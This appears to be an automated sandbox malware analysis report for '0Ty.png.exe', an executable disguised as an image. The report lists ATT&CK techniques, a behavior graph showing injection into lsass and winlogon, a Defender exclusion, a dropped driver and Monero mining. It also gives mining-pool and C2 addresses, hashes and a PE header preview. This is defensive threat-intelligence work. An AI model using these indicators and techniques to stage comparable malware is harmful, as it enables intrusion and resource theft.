            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            Credential API Hooking            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts12
            Native API            		11
            Windows Service            		1
            Access Token Manipulation            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            File and Directory Discovery            		Remote Desktop Protocol1
            Credential API Hooking            		2
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter            		1
            Scheduled Task/Job            		11
            Windows Service            		11
            Obfuscated Files or Information            		Security Account Manager44
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job            		Login Hook712
            Process Injection            		1
            Install Root Certificate            		NTDS351
            Security Software Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts1
            Service Execution            		Network Logon Script1
            Scheduled Task/Job            		1
            Software Packing            		LSA Secrets1
            Process Discovery            		SSHKeylogging3
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable Media1
            PowerShell            		RC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials141
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            File Deletion            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
            Rootkit            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Masquerading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Modify Registry            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd141
            Virtualization/Sandbox Evasion            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
            Access Token Manipulation            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
            Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers712
            Process Injection            		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
            Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
            Hidden Files and Directories            		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580691 Sample: 0Ty.png.exe Startdate: 25/12/2024 Architecture: WINDOWS Score: 100 70 monerooceans.stream 2->70 72 gulf.moneroocean.stream 2->72 74 bg.microsoft.map.fastly.net 2->74 80 Suricata IDS alerts for network traffic 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Multi AV Scanner detection for submitted file 2->84 86 18 other signatures 2->86 10 0Ty.png.exe 1 2 2->10         started        14 weiuemyrzjra.exe 1 2->14         started        16 powershell.exe 2 15 2->16         started        18 powershell.exe 2->18         started        signatures3 process4 file5 66 C:\ProgramData\...\weiuemyrzjra.exe, PE32+ 10->66 dropped 108 Self deletion via cmd or bat file 10->108 110 Uses powercfg.exe to modify the power settings 10->110 112 Modifies the context of a thread in another process (thread injection) 10->112 114 Modifies power options to not sleep / hibernate 10->114 20 dllhost.exe 10->20         started        23 powershell.exe 23 10->23         started        25 cmd.exe 1 10->25         started        36 15 other processes 10->36 68 C:\Windows\Temp\ihddniqxcjeb.sys, PE32+ 14->68 dropped 116 Multi AV Scanner detection for dropped file 14->116 118 Adds a directory exclusion to Windows Defender 14->118 120 Sample is not signed and drops a device driver 14->120 27 dialer.exe 14->27         started        30 powershell.exe 21 14->30         started        38 12 other processes 14->38 122 Writes to foreign memory regions 16->122 124 Injects a PE file into a foreign processes 16->124 32 conhost.exe 16->32         started        34 conhost.exe 18->34         started        signatures6 process7 dnsIp8 88 Contains functionality to inject code into remote processes 20->88 90 Writes to foreign memory regions 20->90 92 Creates a thread in another existing process (thread injection) 20->92 102 2 other signatures 20->102 40 winlogon.exe 20->40 injected 42 lsass.exe 20->42 injected 51 2 other processes 20->51 94 Found suspicious powershell code related to unpacking or dynamic code loading 23->94 96 Loading BitLocker PowerShell Module 23->96 45 conhost.exe 23->45         started        53 2 other processes 25->53 76 monerooceans.stream 194.164.234.171, 10128, 49730 KCOM-SPNService-ProviderNetworkex-MistralGB United Kingdom 27->76 78 85.209.133.29, 49731, 49755, 49775 CMCSUS Germany 27->78 98 Query firmware table information (likely to detect VMs) 27->98 47 conhost.exe 30->47         started        49 conhost.exe 36->49         started        55 14 other processes 36->55 57 11 other processes 38->57 signatures9 100 Detected Stratum mining protocol 76->100 process10 signatures11 59 dllhost.exe 40->59         started        104 Installs new ROOT certificates 42->104 106 Writes to foreign memory regions 42->106 process12 signatures13 126 Injects code into the Windows Explorer (explorer.exe) 59->126 128 Writes to foreign memory regions 59->128 130 Creates a thread in another existing process (thread injection) 59->130 132 Injects a PE file into a foreign processes 59->132 62 svchost.exe 59->62 injected 64 svchost.exe 59->64 injected process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            0Ty.png.exe65%VirustotalBrowse
            0Ty.png.exe66%ReversingLabsWin64.Infostealer.Tinba

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe66%ReversingLabsWin64.Infostealer.Tinba
            C:\Windows\Temp\ihddniqxcjeb.sys5%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://85.209.133.29/lowkey/api/endpoint.php0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.214.172
            		truefalse
              		high
              monerooceans.stream
              		194.164.234.171
              		truefalse
                		high
                gulf.moneroocean.stream
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://85.209.133.29/lowkey/api/endpoint.phptrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 0000001C.00000002.1836172170.000001BF90219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.mdialer.exe, 00000018.00000003.1719273538.0000027DD0413000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000018.00000002.1719637666.0000027DD0417000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://go.micropowershell.exe, 0000001C.00000002.1767100204.000001BF81151000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 0000001C.00000002.1836172170.000001BF90074000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/pscore68powershell.exe, 0000001C.00000002.1767100204.000001BF80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001C.00000002.1767100204.000001BF80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.1767100204.000001BF8022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          194.164.234.171
                                          		monerooceans.streamUnited Kingdom
                                          		8897KCOM-SPNService-ProviderNetworkex-MistralGBfalse
                                          85.209.133.29
                                          		unknownGermany
                                          		33657CMCSUStrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1580691
                                          Start date and time:2024-12-25 17:22:05 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 11m 23s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:70
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:6
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:0Ty.png.exe
                                          Detection:MAL
                                          Classification:mal100.spyw.evad.mine.winEXE@105/17@1/2
                                          EGA Information:
                                          • Successful, ratio: 87.5%
                                          HCA Information:Failed
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): WmiPrvSE.exe
                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 52.165.164.15, 40.69.42.241, 40.126.53.19, 40.126.53.17, 20.190.181.5, 40.126.53.9, 20.231.128.66, 20.231.128.67, 40.126.53.15, 20.190.181.4, 13.107.246.63
                                          • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                          • Execution Graph export aborted for target 0Ty.png.exe, PID 7416 because it is empty
                                          • Execution Graph export aborted for target weiuemyrzjra.exe, PID 4280 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          11:22:57API Interceptor57x Sleep call for process: powershell.exe modified
                                          11:23:38API Interceptor290803x Sleep call for process: lsass.exe modified
                                          11:23:38API Interceptor360735x Sleep call for process: winlogon.exe modified
                                          11:23:39API Interceptor354512x Sleep call for process: dwm.exe modified
                                          11:23:39API Interceptor663x Sleep call for process: svchost.exe modified
                                          11:23:48API Interceptor262x Sleep call for process: dllhost.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          85.209.133.29Od6wNV2xta.elfGet hashmaliciousBillGatesBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            monerooceans.streammain.exeGet hashmaliciousBlank Grabber, SilentXMRMiner, XmrigBrowse
                                            • 149.102.143.109
                                            file.exeGet hashmaliciousXmrigBrowse
                                            • 149.102.143.109
                                            file.exeGet hashmaliciousXmrigBrowse
                                            • 149.102.143.109
                                            file.exeGet hashmaliciousXmrigBrowse
                                            • 149.102.143.109
                                            file.exeGet hashmaliciousXmrigBrowse
                                            • 149.102.143.109
                                            MenSncKnTI.exeGet hashmaliciousXmrigBrowse
                                            • 149.102.143.109
                                            SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse
                                            • 149.102.143.109
                                            MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zipGet hashmaliciousXmrigBrowse
                                            • 44.196.193.227
                                            17ae2fbf36a41622374adfd3b1608e08.10.drGet hashmaliciousUnknownBrowse
                                            • 44.224.209.130
                                            SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeGet hashmaliciousXmrigBrowse
                                            • 44.196.193.227
                                            bg.microsoft.map.fastly.net0442.pdf.exeGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            0442.pdf.exeGet hashmaliciousUnknownBrowse
                                            • 199.232.214.172
                                            yvaKqhmD4L.exeGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exeGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            IoIB9gQ6OQ.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                            • 199.232.210.172
                                            eCompleted_419z.pdfGet hashmaliciousHTMLPhisherBrowse
                                            • 199.232.214.172
                                            3FG4bsfkEwmxFYY.exeGet hashmaliciousFormBookBrowse
                                            • 199.232.214.172
                                            #U5b89#U88c5#U52a9#U624b1.0.3.exeGet hashmaliciousUnknownBrowse
                                            • 199.232.214.172
                                            eCompleted_419z.pdfGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            Onboard Training Checklist v1.1 - Wyatt Young (1).xlsxGet hashmaliciousUnknownBrowse
                                            • 199.232.214.172

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            KCOM-SPNService-ProviderNetworkex-MistralGBhttps://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bvGet hashmaliciousUnknownBrowse
                                            • 194.164.200.113
                                            ub8ehJSePAfc9FYqZIT6.arm.elfGet hashmaliciousMiraiBrowse
                                            • 195.26.252.19
                                            ub8ehJSePAfc9FYqZIT6.sh4.elfGet hashmaliciousUnknownBrowse
                                            • 195.26.252.19
                                            ub8ehJSePAfc9FYqZIT6.ppc.elfGet hashmaliciousUnknownBrowse
                                            • 195.26.252.19
                                            ub8ehJSePAfc9FYqZIT6.m68k.elfGet hashmaliciousMiraiBrowse
                                            • 195.26.252.19
                                            ub8ehJSePAfc9FYqZIT6.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 195.26.252.19
                                            ub8ehJSePAfc9FYqZIT6.mips.elfGet hashmaliciousUnknownBrowse
                                            • 195.26.252.19
                                            ub8ehJSePAfc9FYqZIT6.arm6.elfGet hashmaliciousUnknownBrowse
                                            • 195.26.252.19
                                            ub8ehJSePAfc9FYqZIT6.i686.elfGet hashmaliciousUnknownBrowse
                                            • 195.26.252.19
                                            ub8ehJSePAfc9FYqZIT6.x86.elfGet hashmaliciousUnknownBrowse
                                            • 195.26.252.19
                                            CMCSUSarmv5l.elfGet hashmaliciousUnknownBrowse
                                            • 140.89.4.183
                                            ppc.elfGet hashmaliciousMiraiBrowse
                                            • 140.89.48.90
                                            la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 208.110.207.234
                                            arm5.nn-20241218-1651.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 194.180.237.103
                                            xt.exeGet hashmaliciousXWormBrowse
                                            • 45.66.231.231
                                            https://share.hsforms.com/1Izw71u6TTr2VFC-t9f1KFgsvgdjGet hashmaliciousUnknownBrowse
                                            • 85.208.139.7
                                            x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 50.238.119.249
                                            arm.elfGet hashmaliciousUnknownBrowse
                                            • 50.226.169.202
                                            armv7l.elfGet hashmaliciousMiraiBrowse
                                            • 216.45.216.151
                                            rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 50.220.100.140

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Windows\Temp\ihddniqxcjeb.sysQhx6a6VLAH.exeGet hashmaliciousXmrigBrowse
                                              88aext0k.exeGet hashmaliciousXmrigBrowse
                                                gaozw40v.exeGet hashmaliciousXmrigBrowse
                                                  c2.exeGet hashmaliciousXmrigBrowse
                                                    ldr.ps1Get hashmaliciousGO Miner, XmrigBrowse
                                                      ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                          feZvV3DCj8.exeGet hashmaliciousXmrigBrowse
                                                            services64.exeGet hashmaliciousXmrigBrowse
                                                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse

                                                                Created / dropped Files

                                                                C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\0Ty.png.exe
                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):5457920
                                                                Entropy (8bit):6.515282439309424
                                                                Encrypted:false
                                                                SSDEEP:98304:iAVs069jHTPkc8zU7Jr93Wu+ieSaCKFa/9hAYNS1gtgghI+lw:iMnUjzPkcyI93Wu+ieSaCKFRYNS1gtV8
                                                                MD5:3CAE1F11044D2CA787824610A40F1696
                                                                SHA1:BF4AF642F36E87B887F973F47A46BCB2E656C636
                                                                SHA-256:50AE56D020D35A747BDF32ACBD7C9CC23F8A6827D19C5F32BB05D068ACF47251
                                                                SHA-512:0918A7876C39CF901E9A4128F456683D85D2564767600CE4536C9D0BCD4BE1B380CAD8FCDF6D0B96FD30E48A0F1E73E66DF6D5F279FB31E5FE5ECCA3E2F856A7
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...O.Yg.........."...........R.....@..........@..............................S...........`.....................................................<.............S...............S.x...............................(.......8...........8...`............................text............................... ..`.rdata..,(.......*..................@..@.data...h.R......nR.................@....pdata........S......@S.............@..@.00cfg........S......BS.............@..@.tls..........S......DS.............@....reloc..x.....S......FS.............@..B................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

                                                                Download File
                                                                Process:C:\Windows\System32\lsass.exe
                                                                File Type:very short file (no magic)
                                                                Category:modified
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                Malicious:false
                                                                Preview:.

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):1.1510207563435464
                                                                Encrypted:false
                                                                SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                Malicious:false
                                                                Preview:@...e................................................@..........

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjeb3c5a.juw.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djuimxe0.3el.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohz00dd1.2fh.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1eibgwj.jay.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):64
                                                                Entropy (8bit):0.34726597513537405
                                                                Encrypted:false
                                                                SSDEEP:3:Nlll:Nll
                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                Malicious:false
                                                                Preview:@...e...........................................................

                                                                C:\Windows\Temp\__PSScriptPolicyTest_1udnqygg.d03.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\__PSScriptPolicyTest_e5142syl.zjb.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\__PSScriptPolicyTest_hg3onmei.vbd.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Windows\Temp\__PSScriptPolicyTest_jgqaycec.pgj.psm1

                                                                Download File
